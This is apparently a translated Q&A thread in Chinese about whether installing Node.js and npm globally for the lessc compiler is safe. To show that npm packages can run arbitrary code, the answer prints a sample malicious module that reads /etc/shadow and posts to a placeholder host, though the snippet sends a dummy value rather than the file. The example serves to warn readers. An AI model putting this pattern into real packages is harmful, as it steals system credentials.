这就是为什么我要问:
为了在windows下使用lessc编译器,我必须根据本指南安装Node.js和NPM:http://lesscss.org/#getting-started
所以基本上,我只是:
lessc npm install -g less
详细问题:
我应该注意哪些安全隐患? Node.js是否打开任何端口?它在后台运行吗?它会自动更新吗?
答案 0 :(得分:1)
我应该注意哪些安全隐患?
是的,当然正如评论中@ seven-phases-max已经指出的那样,风险将是你运行一个不安全的脚本或做你不想要的任何事情。
在上面的内容中,您在安装less时使用-g(全局)标志,这意味着您在系统上以超级用户(管理员)的身份安装较少。正如@Explosion_Pills已经解释here:"安装可以运行任意脚本并使用sudo运行它可能非常危险!"
AFAIK每个人都可以在npm上发布一个节点模块,所以我可以发布一个模块并安装它,例如包含:
var request = require('request'),
fs = require('fs');
fs.readFile('/etc/shadow', 'utf8', function (err,data) {
if (err) {
return console.log(err);
}
request.post(
'http://www.example.com/passwords',
{ form: { key: 'value' } },
function (error, response, body) {
if (!error && response.statusCode == 200) {
console.log(body);
}
}
);
});